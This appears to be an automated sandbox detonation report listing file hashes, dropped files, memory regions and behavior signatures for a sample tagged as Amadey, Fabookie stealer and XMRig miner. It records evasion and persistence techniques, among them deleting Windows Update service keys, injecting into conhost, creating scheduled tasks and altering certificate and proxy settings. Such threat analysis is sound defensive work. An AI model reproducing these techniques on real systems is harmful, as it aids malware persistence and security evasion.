SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2056-490-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2056-492-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2256-498-0x000000001B060000-0x000000001B342000-memory.dmp

memory/2256-499-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2256-500-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-501-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-502-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-503-0x000000000275B000-0x0000000002792000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2032-514-0x000000001B010000-0x000000001B2F2000-memory.dmp

memory/2032-515-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-517-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-516-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-518-0x0000000002510000-0x0000000002590000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2744-526-0x000000001B0B0000-0x000000001B392000-memory.dmp

memory/2744-530-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/2744-531-0x00000000026B4000-0x00000000026B7000-memory.dmp

memory/2744-532-0x00000000026BB000-0x00000000026F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

memory/2808-541-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-542-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-540-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-543-0x00000000025D0000-0x0000000002650000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

memory/2240-586-0x0000000001F50000-0x0000000001FD0000-memory.dmp

memory/2240-590-0x0000000001F54000-0x0000000001F57000-memory.dmp

memory/476-598-0x0000000002614000-0x0000000002617000-memory.dmp

memory/476-599-0x000000000261B000-0x0000000002652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-26 01:01

Reported

2023-06-26 01:03

Platform

win10v2004-20230621-en

Max time kernel

155s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 704 set thread context of 2624 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 704 set thread context of 4296 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
